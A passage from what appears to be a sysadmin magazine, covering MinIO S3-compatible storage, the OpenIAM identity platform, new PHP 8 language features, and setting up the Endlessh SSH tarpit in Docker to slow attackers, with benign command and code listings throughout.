With the MinIO client, which I discuss later in detail, admins instead simply define the source and target and issue the instructions for replication. The replication target does not even have to be another MinIO instance. Basically, any storage device that can be connected to MinIO can be considered – including official Amazon S3 or devices that speak the S3 protocol, such as some network-attached storage (NAS) appliances.

Encryption Included

The role of encryption is becoming increasingly important against the background of data protection and the increasing desire for data sovereignty. In the past, the ability to enable transport encryption was considered sufficient, but today, the demand for encryption of stored data (encryption at rest) is becoming stronger. MinIO has heard admins calling for this function and provides a module for dynamic encryption as part of the object layer. On state-of-the-art CPUs, it uses hardware encryption modules to avoid potential performance problems caused by computationally intensive encryption.

Archive Storage

Various regulations today require, for example, government agencies to use write once, read many (WORM) devices, which means that data records can no longer be modified once they have been sent to the archive. MinIO can act as WORM storage. If so desired, all functions that enable write operations can be deactivated in the MinIO API.
However, don't wax overly euphoric at this point – many authorities also require that systems be certified and approved for the task by law. The MinIO website shows no evidence that MinIO has any such certification. In many countries, this solution would be ruled out for policy reasons in the worst case.
S3 Only

MinIO makes redundant storage with built-in encryption, anti-bit-rot functions, and the ability to replicate to three locations easy to implement. S3 is the client protocol used – a major difference compared with other solutions, especially industry leader Ceph. Just as OpenStack Swift is designed for Swift only, MinIO is designed to operate as an S3-compatible object store only.
MinIO therefore lacks the versatility of Ceph: It cannot simply be used as a storage backend for virtual instance hard drives. Also, the features that Ceph implements as part of CephFS in terms of a POSIX-compatible filesystem are not part of the MinIO strategy, but if you're looking for S3-compatible storage only, MinIO is a good choice.
If you additionally need backend storage for virtual instances such as virtual machines or Kubernetes instances, you will need to operate a second storage solution in addition to MinIO, such as a NAS or storage area network system. Although not very helpful from an administrative point of view, the S3 feature set implemented in MinIO is significantly larger than that of the Ceph Object Gateway. Specialization is definitely a good thing in this respect.

Jack of All Trades

At this point, the MinIO client deserves a closer look, because it is far more than a simple S3 client. If you specify an S3 rather than a MinIO instance as the target, its features can also be leveraged by the MinIO client. The client goes further by emulating a kind of POSIX filesystem at the command line – but one that is remotely located in S3-compatible storage. The tool, mc, is already known in the open source world and offers various additional commands, such as ls and cp. By setting up cp as an alias for mc cp or ls as an alias for mc ls, you don't even need to type more than the standard commands, which will then always act on the S3 store. Additionally, mc provides auto-completion for various commands.
What is really important from the user's point of view, however, is that this command can be used to change the metadata of objects in the S3 store. If you want to replicate a bucket from one S3 instance to another, you need the mirror command. To use this, you first set up several S3-based storage backends in mc and then stipulate that individual buckets must be kept in sync between the two locations. Replication between two MinIO instances is also quickly set up with mc replicate. If you want a temporary share of a file in S3 together with a temporary link, you can achieve this with the mc share command, which supports various parameters.
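In practice, that workflow might look like the following sketch. The alias names, endpoints, and credentials are made up for illustration; the subcommands (alias set, ls, cp, mirror, share) are standard mc vocabulary, but check mc --help for the exact syntax of your version:

# Register two S3-compatible endpoints under short alias names
$ mc alias set local http://localhost:9000 admin password123
$ mc alias set offsite https://s3.amazonaws.com AKIA... SECRET...

# POSIX-style navigation and copying against the object store
$ mc ls local/backups
$ mc cp /etc/hosts local/backups/

# Keep a bucket in sync between the two backends
$ mc mirror local/backups offsite/backups-mirror

# Hand out a time-limited download link for a single object
$ mc share download --expire 24h local/backups/hosts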

Simple Management

Another detail distinguishes MinIO from other solutions like the Ceph Object Gateway: The tool has a graphical user interface (GUI) as a client for the stored files. The program, MinIO Browser (Figure 2), prompts for the usual S3 user credentials when called. The user's buckets then appear in the overview. Various operations can be initiated in the GUI, but it is not as versatile as the command-line (CLI) client. Most admins will probably give priority to the CLI version, especially because it, unlike the GUI, is suitable for scripting.

Figure 2: The MinIO Browser acts as a graphical interface for accessing content stored in MinIO. ©MinIO

Interfaces to Other Solutions

One central concern of the MinIO developers is apparently to keep their solution compatible with third-party services, which, in practice, is very helpful because it means you do not have to take care of central services yourself (e.g., user management). Instead, you could combine a MinIO installation with an external identity provider such as WSO2 or Keycloak.
This principle runs throughout the software. MinIO itself comes with a key management service (KMS), for instance, which takes care of managing cryptographic keys. This part of the software is part of the encryption mechanism that secures stored data and implements true encryption at rest. However, if you are already using an instance of HashiCorp Vault, you can also link MinIO to it through the configuration, which avoids uncontrolled growth of solutions for specific applications.
Monitoring is another example: MinIO offers a native interface for the Prometheus monitoring, alerting, and trending solution; the developers also provide corresponding queries for Grafana.
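Hooking the store into an existing Prometheus server then comes down to an ordinary scrape job. A sketch, assuming a MinIO endpoint on localhost:9000; the metrics path and the authentication mode (recent releases expect a bearer token generated with mc admin prometheus generate) depend on the MinIO version, so treat the details as assumptions:

# prometheus.yml excerpt
scrape_configs:
  - job_name: minio
    metrics_path: /minio/prometheus/metrics   # path varies by MinIO release
    scheme: http
    static_configs:
      - targets: ['localhost:9000']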
TO O L S MinIO

All of the many different S3 clones on the market, such as the previously mentioned Ceph Object Gateway, have one central feature in common: They use a protocol that Amazon never intended for implementation by third parties. Amazon S3 is not an open protocol and is not available under an open source license. The components underlying Amazon's S3 service are not available in open source form either.

All S3 implementations on the market today are the result of reverse engineering. The starting point is usually Amazon's S3 SDK, which developers can use to draw conclusions about which functions a store must be able to handle when calling certain commands and what feedback it can provide. Even Oracle now operates an S3 clone in its own in-house cloud, the legal status of which is still unclear.

For the users of programs like MinIO and for their manufacturers, this uncertain status results in at least a theoretical risk. Up to now, Amazon has watched the goings-on and has not taken action against S3 clones. Quite possibly the company will stick to this strategy. However, it cannot be completely ruled out that Amazon will tighten the S3 reins somewhat in the future. The group could justify such an action, for example, by saying that inferior S3 implementations on the market are damaging the core brand, which in turn could have negative consequences for companies that use S3 clones locally.

If Amazon were to prohibit MinIO, for example, from selling the software and providing services for it by court order, users of the software would be out in the rain overnight. MinIO would then continue to run, but it would hardly make sense to operate it, and it would therefore pose an inherent operating risk.

Unclear Situation

How great the actual danger is that this scenario will occur cannot be realistically quantified at the moment. For admins, then, genuine security that a functioning protocol is available in the long term can only be achieved with the use of open source approaches. A prime example would be OpenStack Swift, which is the name of both the component and the protocol itself. However, the number of solutions on the market that implement OpenStack Swift is tiny: Besides the original, only the Ceph Object Gateway with Swift support is available. That hardly amounts to real choice.

Conclusions

MinIO is a powerful solution for a local object store with an S3-compatible interface. In terms of features, the solution is cutting edge: Constant consistency checks in the background, encryption of stored data at rest, and erasure coding for more efficient use of disk space are functions you would expect from a state-of-the-art storage solution. Because the product is available free of charge under an open source license, it can also be tested and used as part of proof-of-concept installations. If you want commercial support, you can get the appropriate license – but do expect to pay quite a serious amount of money for it.

The Author
Martin Gerhard Loschwitz is Cloud Platform Architect at Drei Austria and works on topics such as OpenStack, Kubernetes, and Ceph.

Identity and access management with OpenIAM

Authorization Center
Identity and access management plays a central role in modern IT infrastructures, with its local resources,
numerous applications, and cloud services. We investigate how OpenIAM implements centralized user
management. By Thorsten Scherf

Managing user identities decentrally and manually, directly within applications, is not only error-prone, it also takes up valuable time and involves administrative overhead. Storing users and their access authorizations for certain systems and applications in a central location makes sense, especially in hybrid environments, where applications exist both on-premises and in various clouds.

Identity and access management (IAM) tools typically provide a number of functions to facilitate this work. Not only does the software provide user lifecycle and access management, it needs to offer other features, such as a self-service portal for resetting user passwords or for additional authorization requests. A single sign-on based on modern protocols such as OpenID Connect or Security Assertion Markup Language 2.0 (SAML2) should also be part of the standard scope. Flexible auditing is necessary to implement compliance requirements for a centralized system of this type, and SAML2 will certainly become interesting for increasing numbers of businesses in the light of data protection regulations (e.g., the European Union's General Data Protection Regulation, GDPR).

Although the vast majority of IAM products support these requirements, they present no uniform implementation approach in practical terms. OpenIAM [1] is a fully integrated platform that manages user identities and access rights, supporting all requirements companies need in a modern IAM tool.

Microservice-Based Architecture

OpenIAM essentially comprises two components: Identity Governance and the Access Manager. To fulfill its task, the software relies completely on a service-oriented architecture (SOA) and uses an enterprise service bus (ESB) for communication between the individual services. To map these two core components of the software, the tool provides more than 20 different services in the service layer that communicate with the help of the ESB. Figure 1 shows the schematic structure of the individual layers and their components.

Figure 1: OpenIAM provides its services in different layers.

Users usually access OpenIAM from a graphical interface. The user interface allows access to both the self-service portal and administrative tools. For access to enterprise applications, OpenIAM also acts as an identity provider (IdP). As usual, the interface can be adapted to reflect a corporate identity.

A Tomcat server provides the individual services in the service layer. The infrastructure components comprise RabbitMQ for the message bus, Redis as an in-memory cache, and Elasticsearch for all search queries. Any relational database can run on the backend. OpenIAM offers schema files for MySQL, MariaDB, Microsoft SQL Server, PostgreSQL, and Oracle databases. Notably, the software provides a REST API in addition to the graphical user interface, which allows developers to extend the software according to their own requirements or to link it with external tools.
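
What scripting against such a REST API can look like is easy to sketch. The following Python snippet queries a hypothetical user endpoint; the URL path, query parameter, and bearer-token handling are illustrative placeholders rather than OpenIAM's documented interface:

import requests

# Hypothetical lookup against an OpenIAM server; the endpoint path,
# parameter, and token are placeholders, not the documented API.
BASE = "https://iam.example.com/openiam"
TOKEN = "..."  # obtained from the identity provider beforehand

resp = requests.get(
    f"{BASE}/api/users",
    params={"login": "jdoe"},
    headers={"Authorization": f"Bearer {TOKEN}"},
    timeout=10,
)
resp.raise_for_status()
for user in resp.json():
    print(user)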

User Provisioning with Connectors

In a typical IAM use case, as soon as a new employee joins a company, they are given access to all the systems they need for their daily work. Likewise, when an employee leaves the company, access to these systems must be revoked. OpenIAM solves this task by provisioning or deprovisioning user accounts on the respective systems. The software assumes a single authoritative source in the company that holds all employee data – usually a human resources (HR) system, but in the simplest case it can also be a CSV file, which is very well suited in testing scenarios for becoming familiar with the system.

With the help of connectors, OpenIAM accesses and imports the data into the OpenIAM identity repository. This process takes place during the initial setup of the software until a consistent state exists between the source system from which the data comes and the OpenIAM repository. During operation, constant synchronization between these systems takes place. If, for example, the department in which an employee works changes on the HR system, it is also reflected in OpenIAM. The systems can be synchronized either by regular polling of the source system or triggered by events. In event-based synchronization, the source system relies on OpenIAM's provisioning API to initiate a quasi real-time sync.

The software evaluates the data from the identity repository and decides, on the basis of predefined rules, to which systems a user should have access and which rights they should be given on those systems. Rules can be created according to any attributes of a user object. For example, users with the devel role could be given access to all development systems within the company or a department, whereas access to HR systems would be denied to these users.

Rules Assign Attributes

With the help of rules, you also can map attributes between OpenIAM and a target system. For example, if a user from the HR system has been synchronized and has an employee_ID attribute, you will probably want to assign this attribute to the Lightweight Directory Access Protocol (LDAP) employeeNumber attribute when synchronizing with Active Directory or some other directory. Within the software, you create a suitable rule for this purpose, which is then stored as a Groovy script in OpenIAM. You can modify the script at any time with the GUI editor.

When data evaluation is complete, the accounts are provisioned to the target systems. For this purpose, the connectors I mentioned before are again used. To this end, OpenIAM offers a whole range of predefined connectors that enable access to LDAP, Microsoft Office 365, Active Directory, Exchange, Google Suite, SAP enterprise resource planning software, Oracle RDBMS and eBusiness Suite (EBS), Workday, ServiceNow, and Linux systems. You will find a complete list online [2]. If required, you can, of course, adapt these connectors or add new ones.

In OpenIAM, rules define which accounts should be provisioned to which target systems. The system appropriately calls these target systems "managed systems." Again, if a change is made to an account in the OpenIAM repository, it is also reflected in the managed systems. At this point, note that OpenIAM naturally lets you configure password policies. If a user's password changes within the application – either through the self-service portal or by the actions of an administrator – it must meet the complexity requirements defined in the policy.

Self-Service Portal

Users already provisioned can request access to additional systems or extensions of their rights on existing systems in the user interface. For this purpose, OpenIAM provides a service catalog from which users can select the desired systems and authorizations. One interesting feature is the ability to limit the access rights requested in this way, which is particularly useful if an employee only needs temporary access to certain services for a project. The procedure also includes an approval process. If the OK for the request comes from one or more approvers, the software in turn automatically ensures that the user is provisioned to the system and receives the necessary rights. Figure 2 shows the complete provisioning process.

Figure 2: OpenIAM provides accounts on the desired target systems. © OpenIAM [3]
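
OpenIAM itself stores this kind of logic as Groovy scripts, but the shape of such a rule is easy to illustrate. The following Python sketch mimics the two steps described above: deciding target systems from a role, and mapping the employee_ID attribute to LDAP's employeeNumber. The role, system, and attribute names are examples only, not OpenIAM objects:

# Illustration of provisioning-rule logic only; OpenIAM itself
# expresses such rules as Groovy scripts.
def target_systems(user):
    systems = ["ldap"]                  # everyone gets a directory account
    if "devel" in user.get("roles", []):
        systems.append("dev-servers")   # devel role unlocks development systems
    return systems                      # HR systems deliberately left out

def map_to_ldap(user):
    # Rename the HR attribute employee_ID to LDAP's employeeNumber
    return {"uid": user["login"], "employeeNumber": user["employee_ID"]}

new_hire = {"login": "jdoe", "employee_ID": "4711", "roles": ["devel"]}
print(target_systems(new_hire))
print(map_to_ldap(new_hire))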

Web Access Manager

In addition to Identity Governance, Web Access Manager is the second integral component within the OpenIAM framework. As the name suggests, this component authorizes users after they have gained access to a system. As well as access controls, it provides other services and features, such as single sign-on, multifactor authentication, and session management, and integrates these into Access Management.

One central component of Web Access Manager is single sign-on with federated user identities. In this case, OpenIAM serves as an identity provider and ensures that access to service providers, such as Salesforce or Oracle, takes place transparently for the user through the use of state-of-the-art protocols like OpenID Connect or SAML2. For this purpose, a position of trust between different security domains must be established in the configuration.

In practical terms, a redirect to the OpenIAM framework occurs when one of these applications is accessed. For example, the user authenticates against OpenIAM with OAuth 2.0 and, if successful, is issued a JSON web token (JWT) that then serves as an ID token to log on to the service provider. Users can also call an application from a remote security domain directly from the OpenIAM interface (Figure 3). The authentication process is completely transparent to users, who can also use the ID token to log on to other systems. Another interesting feature is that OpenIAM provides a reverse proxy for applications that do not support the federation protocols used, which means that legacy applications can also benefit from single sign-on.

Figure 3: With OpenID Connect or SAML2, users can access applications in remote security domains with single sign-on.
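
Such an ID token is simply a signed JSON structure, so its claims are easy to inspect. The following Python sketch decodes the payload of a placeholder token with nothing but the standard library; it does not verify the signature, so it is suitable for debugging only:

import base64, json

token = "eyJhbGciOi..."  # placeholder for a JWT issued by the IdP

# A JWT consists of three dot-separated Base64URL parts:
# header, payload (the claims), and signature.
payload = token.split(".")[1]
payload += "=" * (-len(payload) % 4)   # restore stripped padding
claims = json.loads(base64.urlsafe_b64decode(payload))
print(claims.get("sub"), claims.get("exp"))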

Testing OpenIAM

If you are interested in trying out OpenIAM, you have two possibilities: the Community and Enterprise versions. The Community version is available for free download on the OpenIAM website [4]. The Enterprise Edition offers two subscription models that provide access to additional resources and support beyond the software itself. The current 4.2.0.1 version (at press time) supports Red Hat Enterprise Linux 8 and CentOS 8, but earlier versions of the RPM package before 4.1.6 only run on Red Hat Enterprise Linux 7 or CentOS 7.

It is somewhat unusual that the RPM only packages the OpenIAM sources as a tarball, which it then simply unpacks under /usr/local/OpenIAM/ when installing the package. But at least the package makes sure that these files disappear when you uninstall the software. As an alternative to installing the RPM file, you can also obtain a container image of the software and then run it with a container runtime. Only Docker is officially supported, but the container image should work with the Podman runtime without any problems; I did not try this out when writing this article.

Conclusions

OpenIAM is an extremely complex and comprehensive piece of software for the management of user identities and access rights. The tool supports all requirements that companies have for a modern IAM tool. Thanks to the service-oriented architecture (SOA) and the numerous APIs that the software provides, it is easy to adapt or extend it to your own needs.

The integrated Groovy scripting language lets you create scripts that synchronize users from a source system to any target system with flexible mapping of user attributes. Together with single sign-on support, OpenIAM also acts as an identity provider and combines this with sophisticated access management. The feature scope naturally requires a certain amount of training; however, the effort will certainly pay off in later operation. After all, OpenIAM helps you automate almost all operations for identity and access management.

Info
[1] OpenIAM: [https://www.openiam.com]
[2] OpenIAM connectors: [https://www.openiam.com/products/identity-governance/connectors/]
[3] Provisioning: [https://www.openiam.com/products/identity-governance/features/provisioning/provisioning-2/]
[4] OpenIAM download: [https://www.openiam.com/registration/]

The Author
Thorsten Scherf is a Senior Principal Product Experience Engineer who works in the global Red Hat Identity Management team. You can meet him as a speaker at various conferences.


New features in PHP 8

Conversion Work
After about two years of development, version 8 of the popular PHP scripting language was released on
November 26, 2020. It comes with a number of innovations and ditches some obsolete features. By Tim Schürmann

One of the major innovations in PHP is intended to give the scripting language a boost, but it does require some prior knowledge. As of version 5.5, the code to be executed has been stored in a cache provided by the OPcache extension [1]. Thanks to this cache, the interpreter does not have to re-read the scripts for every request. PHP 8 sees OPcache expanded to include a just-in-time (JIT) compiler. This converts parts of the PHP code into native program code, which the processor then executes directly and far faster as a consequence. As a further speed tweak, the generated binary code is also cached. When the PHP code is restarted, PHP 8 simply accesses the precompiled binary code from the cache.

As the first benchmarks by PHP developer Brent Roose show [2], scripts with repetitive or extensive calculations obviously benefit from these changes. When handling individual short requests, the JIT compiler shows its advantages to a far lesser extent.

Abbreviation

The syntax, which has changed slightly in some places in PHP 8, saves developers some typing. For example, the scripting language adds a more powerful and more compact match function to supplement switch. In Listing 1, $flasher is only On if $lever is set to Up or Down. If none of the comparison values before => are correct, the default value applies.

Listing 1: match
$flasher = match ($lever) {
  0 => "Warning_Flasher",
  'Up', 'Down' => "On",
  default => "Off"
};

The call to $user->address->getBirthday()->asString() in Listing 2 only works if $address exists and getBirthday() returns a valid object. To do this, developers previously had to nest several if branches. The new nullsafe operator ?-> checks the existence automatically and reduces the test to one line (line 15).

Listing 2: Happy Birthday?
01 // ---- previously --------
02 if ($user !== null) {
03   $a = $user->address;
04
05   if ($a !== null) {
06     $b = $a->getBirthday();
07
08     if ($b !== null) {
09       $bday = $b->asString();
10     }
11   }
12 }
13
14 // ---- in PHP 8 --------
15 $bdate = $user?->address?->getBirthday()?->asString();

Where a class needs to encapsulate an address or other data, the developer usually first notes the appropriate variables, which are then assigned values by a constructor (Listing 3, lines 2-12). In PHP 8, this can be written in a concise way (Listing 3, lines 15-21).
The constructor now collects all the required information, from which PHP 8 automatically derives the complete class structure. Thanks to the Constructor Property Promotion syntax, programmers can create data objects far faster and also refactor them more quickly later.

Listing 3: Encapsulating Data
01 // ---- previously --------
02 class Address
03 {
04   public string $name;
05   public DateTimeImmutable $birthday;
06
07   public function __construct(string $n, DateTimeImmutable $g)
08   {
09     $this->name = $n;
10     $this->birthday = $g;
11   }
12 }
13
14 // ---- in PHP 8 --------
15 class Address
16 {
17   public function __construct(
18     public string $name,
19     public DateTimeImmutable $birthday,
20   ) {}
21 }

Exceptional Phenomenon

Until now, PHP developers always had to catch exceptions in a variable, even if they didn't want to do anything else with the corresponding object. From PHP 8 on, in such situations you simply omit the variable and just specify the type. If you want to handle all errors in the catch block, simply catch Throwable (Listing 4).

Listing 4: Throwable
try {
  [...]
} catch (Throwable) {
  Log::error("Error!");
}

The get_class() function returns an object's class name. Developers using PHP 8 or higher can access this class name with an appended ::class, as shown in Listing 5.

Listing 5: Class Name
$a = new Address();
var_dump($a::class);

Typical!

Functions expect their parameters in a given order. Especially with a large number of parameters, it is easy to lose track. The following code, which calculates the volume of a box, for example, does not make it entirely clear which value stands for the width:

$v = volume(10, 3, 2);

In PHP 8, developers can explicitly note the names of the corresponding parameters to ensure clarity. When using these named arguments, you also choose the order of the parameters according to your needs. Optional parameters can also be omitted, like $depth in the example shown in Listing 6. By the way, Listing 6 shows a further innovation: After the last parameter, you can use another comma, even if no further parameters follow.

Listing 6: Named Parameters
function volume(int $width, int $height, int $depth = 1)
{ return $width * $height * $depth; }
$v = volume(height: 3, width: 10,);

Flextime

When you compute with integers, floating-point numbers are often generated. Wouldn't it be useful if the corresponding function could return an int or a float value as needed? In PHP 8, this is achieved with union types: You simply combine several possible data types with a pipe character (|). In the example shown in Listing 7, area() returns either an int or a float value.

Listing 7: Data Types with Pipe
class Rect {
  public int|float $x, $y, $w, $h;

  public function area(): int|float {
    return $this->w * $this->h;
  }
}

Another new data type is mixed. It stands for one of the data types array, bool, callable, int, float, null, object, resource, or string. The mixed data type always occurs if the type information is missing. For example, you can use mixed to indicate that you cannot or do not want to specify the type of a variable at the corresponding position.

The new WeakMap data structure works much like an array but uses objects as keys (Listing 8). Garbage collection can also collect the used objects, so if the program destroys $a at some point further downstream (e.g., intentionally with unset($a);), PHP would automatically remove the corresponding $cache[$a] entry.

Listing 8: WeakMap
$cache = new WeakMap;
$a = new Address;
$cache[$a] = 123;

In Figure 1, var_dump() outputs WeakMap once; an address object acts as the key here. Then unset() destroys this object, which automatically removes the entry from WeakMap. This is proven by the second output of var_dump() (shown in the last two lines of Figure 1). One of WeakMap's main areas of application is customized caching.

Figure 1: The entry in WeakMap disappears along with the object.
More Functional

Whether or not the Hello World string contains the word World used to be determined with the strpos() function. In PHP 8, there is an alternative to this: str_contains() (Listing 9). The siblings str_starts_with() and str_ends_with(), which search for the word at the beginning and at the end of the string, respectively, are new. The fdiv() function divides a floating-point number by zero without grumbling and returns INF, -INF, or NAN.

Listing 9: str_contains()
if (str_contains('Hello World', 'World')) { [...] }

The get_debug_type() function determines the data type of a variable. In contrast to the already existing gettype(), the new function also identifies strings, arrays, and closed resources, and it reveals the classes of objects. As the function name suggests, it is mainly intended to make writing debug messages easier. Each resource, such as an open database connection, is assigned an internal identification number. Developers now can also address them in a type-agnostic way using get_resource_id().

The well-known token_get_all() function returns the matching PHP tokens for PHP source code [3]. Each token can be either a string or an array, which is anything but handy. This has led to PHP 8 introducing the PhpToken class. Its getAll() method returns an array of PhpToken objects, which in turn encapsulate the individual tokens. This token_get_all() replacement is easier to use, but at the price of using more memory.

Attributes

Many other languages offer annotations to let programmers attach metadata to classes. In this way, developers can make a note of, say, the database table in which a class stores its data. PHP 8 now has an option for this in the form of attributes. The actual information is located between #[ ... ] directly in front of the class, as shown in Listing 10.

Listing 10: Attributes
#[DatabaseTable("User")]
class User
{
  #[DatabaseColumn]
  public $name;

  public function setBirthday(#[ExampleAttribute] $bday) { }
}

As the example demonstrates, attributes can be attached to classes, but also to variables, constants, methods, functions, and parameters. The information's structure and content is determined by the developer or a framework that evaluates the attributes. In Listing 10, the class is assigned an attribute of DatabaseTable. If necessary, you can pass in parameters in the brackets. The example reveals that the database table is named User.

The PHP developers have been working on the syntax for attributes for quite some time. There was some talk of using <<ExampleAttribute>> and @@ExampleAttributes as tags, and you will find references to this in numerous posts on PHP 8.

Attributes can be read using the Reflection API. The example shown in Listing 11 uses the new getAttributes() method to get all the attributes for the User class as an array. Each entry encapsulates an object of the type ReflectionAttribute. Among other things, this new class has a getName() method that reveals the name of the attribute.

Listing 11: Reading Attributes
01 $reflectionClass = new \ReflectionClass(User::class);
02 $attributes = $reflectionClass->getAttributes();
03 var_dump($attributes[0]->getName());
04 var_dump($attributes[0]->getArguments());

The getName() method is used in line 3 of Listing 11, which simply outputs the name of the attribute via var_dump() – DatabaseTable in the example. Similarly, getArguments() in line 4 returns the corresponding parameters as an array (Figure 2).

Figure 2: For the #[DatabaseTable("User")] attribute, the Reflection API correctly returns DatabaseTable as the name and User as the parameter. All parameters are bundled into an array.

Small Matters

Sorting functions in PHP have not been stable thus far, leaving the order of identical elements in the sorted results to chance. In PHP 8, all sorting routines adopt identical elements in the order that existed in the original array.

The PHP developers have also introduced a new Stringable interface, which a class implements automatically if it offers the __toString() method. The string|Stringable union type then accepts both strings and objects with the __toString() method. This in turn is intended to improve type safety.

Since the JSON data format is now the format of choice in many web applications, PHP 8 can no longer be compiled without the JSON extension. Developers can more easily convert DateTime and DateTimeImmutable into each other using DateTime::createFromInterface() and DateTimeImmutable::createFromInterface().
static can also be used as the return type (Listing 12).

Listing 12: static
class Foo {
  public function create(): static {
    return new static();
  }
}

Traits

Developers can use traits to smuggle functions into classes without paying attention to the inheritance hierarchy [4]. Listing 13 shows an example of this: A trait can also define abstract functions, which the individual classes must implement in turn. PHP 8 is the first version to check these function signatures. The implementation of the Circle class thus throws an error because of the wrong string return type (Figure 3).

Listing 13: Traits
trait Coordinates {
  abstract public function area(): int;
}

class Rectangle {
  use Coordinates;
  public function area(): int { [...] }
}

class Circle {
  use Coordinates;
  public function area(): string { [...] }
}

Figure 3: Here, PHP 8 has detected that the Circle class implements the area() function incorrectly.

Elsewhere PHP is more agnostic: Until now, the interpreter applied some inheritance rules to private methods, even if they were not visible in the derived class. In PHP 8 this no longer happens, which means that the code shown in Listing 14 now runs without an error message.

Listing 14: Inheritance Theory
class Foo {
  final private function calc() { [...] }
}

class Bar extends Foo {
  private function calc() { [...] }
}

Changes

PHP 8 irons out some inconsistencies and breaks backwards compatibility. For example,

0 == "foo"

is now considered false. PHP 8 only evaluates the . operator for concatenating strings after an addition or subtraction. Code such as

echo "Length: " . $y - $x;

is now interpreted by PHP 8 as

echo "Length: " . ($y - $x);

Namespaces may no longer contain spaces in their names, but from now on reserved keywords are also allowed as parts of a namespace identifier. Within the Reflection API, the signatures of some methods have changed. For example, instead of ReflectionClass::newInstance($args);, PHP 8 uses the ReflectionClass::newInstance(...$args); method. However, if you want the PHP code to run under PHP 7 and 8, the PHP team recommends using the notation shown in Listing 15.

Listing 15: Reflection Class Notation
ReflectionClass::newInstance($arg = null, ...$args);

Stricter Reporting Requirements

If you call existing scripts in PHP 8, you can expect numerous error messages. Besides some incompatible changes, the main reason for these errors is stricter handling. From now on, the error report level E_ALL will be used by default. Additionally, the @ operator can no longer be used to suppress fatal errors. Developers must also be prepared for SQL errors when connecting to databases via the PDO interface: Error handling now uses exception mode by default (PDO::ERRMODE_EXCEPTION).

Arithmetic and bitwise operators throw a TypeError if one of the operands is an array, a resource, or an object without operator overloading. One exception occurs if you merge two arrays using array + array. Division by zero throws a DivisionByZeroError in PHP 8.

Finally, PHP 8 removes some functions and language constructs already tagged as deprecated in version 7.x. The PHP developers meticulously list all incompatible changes in a long document online [5]. If you need to maintain existing PHP code, you will definitely want to check out this document.

Conclusions

PHP 8 includes many useful new features that make the developer's life easier and provide for more compact code. In particular, the new match, Constructor Property Promotion, and attributes should quickly find many friends. In addition, PHP 8 cautiously throws out some outdated behaviors and constructs. Existing PHP applications, however, will most likely need to be adapted as a result. Whether the JIT compiler really delivers the hoped-for performance boost or only gives PHP code a boost in special cases remains to be seen in practice.

Info
[1] OPcache: [https://www.php.net/manual/en/book.opcache.php]
[2] "PHP 8: JIT performance in real-life web applications": [https://stitcher.io/blog/jit-in-real-life-web-applications]
[3] token_get_all: [https://www.php.net/manual/function.token-get-all.php]
[4] Traits: [https://www.php.net/manual/language.oop5.traits.php]
[5] Upgrading to PHP 8.0: [https://github.com/php/php-src/blob/master/UPGRADING]

The Author
Tim Schürmann is a freelance computer scientist and author. Besides books, Tim has published various articles in magazines and on websites.
Endlessh and tc tarpits slow down attackers

Sticky Fingers
Keep an attacker’s connections open in an Endlessh “tarpit” or delay incoming connections with the more
traditional rate-limiting approach of tc. By Chris Binnie
A number of methods can stop attackers from exhausting your server resources, such as filtering inbound traffic with a variety of security appliances locally or by utilizing commercial, online traffic-scrubbing services to catch upstream traffic for mitigating denial-of-service attacks. Equally, honeypots can be used to draw attackers in, so you get a flavor of the attacks that your production servers might be subjected to in the future.

In this article, I look at a relatively unusual technique for slowing attackers down. First, Endlessh, a natty piece of open source software, can consume an attacker's resources by keeping their connections open (so that they have less ability themselves to attack your online services), leaving them in a "tarpit." Second, to achieve similar results, a more traditional rate-limiting approach, courtesy of advanced Linux networking and traffic control (tc), is investigated with the kernel's built-in Netfilter packet filter controlled by its iptables frontend.

As surely as night follows day, automated attacks will target the default Secure Shell port (TCP port 22), so I will use SSH as the guinea pig test case with the knowledge that I can move the real SSH service to an alternative port without noticeable disruption.

Sticky Connections

If you visit the GitHub page for Endlessh [1], you are greeted with a brief description of its purpose: "Endlessh is an SSH tarpit that very slowly sends an endless, random SSH banner. It keeps SSH clients locked up for hours or even days at a time."

The documentation goes on to explain that if you choose a non-standard port for your SSH server and leave Endlessh running on TCP port 22, it's possible to tie attackers in knots, reducing their ability to do actual harm. One relatively important caveat, though, is that if you commit too much capacity to what is known as tarpitting (i.e., bogging something down), it is possible to cause a denial of service unwittingly to your own services. Therefore, you should never blindly deploy security tools like these in production environments without massive amounts of testing first.

The particular tarpit I build here on my Ubuntu 20.04 (Focal Fossa, with the exceptionally aesthetically pleasing Linux Mint 20 Ulyana sitting atop) will catch the connection when the SSH banner is displayed, before SSH keys are exchanged. By keeping things simple, you don't have to worry about the complexities involved in solving encryption issues.

In true DevOps fashion, I fire up Endlessh with a Docker container:

$ git clone https://github.com/skeeto/endlessh

If you look at the Dockerfile within the repository, you can see an image that uses Alpine Linux as its base (Listing 1).

Listing 1: Endlessh Dockerfile
FROM alpine:3.9 as builder
RUN apk add --no-cache build-base
ADD endlessh.c Makefile /
RUN make

FROM alpine:3.9
COPY --from=builder /endlessh /
EXPOSE 2222/tcp
ENTRYPOINT ["/endlessh"]
CMD ["-v"]

Assuming Docker is installed correctly (following the installation process for Ubuntu 20.04 in my case, or as directed otherwise [2]), you can build a container with the commands:

$ cd endlessh/
$ docker build -t endlessh .
[...]
Successfully built 6fc5221548db
Successfully tagged endlessh:latest

Next, check that the container image exists with docker images (Listing 2).

Listing 2: docker images
$ docker images
REPOSITORY  TAG     IMAGE ID      CREATED             SIZE
endlessh    latest  6fc5221548db  58 seconds ago      5.67MB
<none>      <none>  80dc7d447a48  About a minute ago  167MB
alpine      3.9     78a2ce922f86  5 months ago        5.55MB

Now you can spawn a container. If you are au fait with Dockerfiles, you will have spotted that TCP port 2222 will be exposed, as shown in the output:
$ docker run -it endlessh
2020-11-09T15:38:03.585Z Port 2222
2020-11-09T15:38:03.586Z Delay 10000
2020-11-09T15:38:03.586Z MaxLineLength 32
2020-11-09T15:38:03.586Z MaxClients 4096
2020-11-09T15:38:03.586Z BindFamily IPv4 Mapped IPv6

The command you really want to use, however, will expose that container port on the underlying host, too:

$ docker run -d --name endlessh -p 2222:2222 endlessh

You can, of course, adjust the first 2222 entry and replace it with 22, the standard TCP port. Use the docker ps command to make sure that the container started as hoped. In another terminal, you can check to see whether the port is open as hoped by the Docker container (Listing 3).

Listing 3: Checking for Open Port
$ lsof -i :2222
COMMAND   PID   USER FD TYPE DEVICE SIZE/OFF NODE NAME
docker-pr 13330 root 4u IPv4 91904  0t0      TCP  *:2222 (LISTEN)

Next, having proven that you have a working Endlessh instance, you can put it through its paces. A simple test is to use the unerring, ultra-reliable netcat to see what is coming back from port 2222 on the local machine:

$ nc -v localhost 2222
Connection to localhost 2222 port [tcp/*] succeeded!
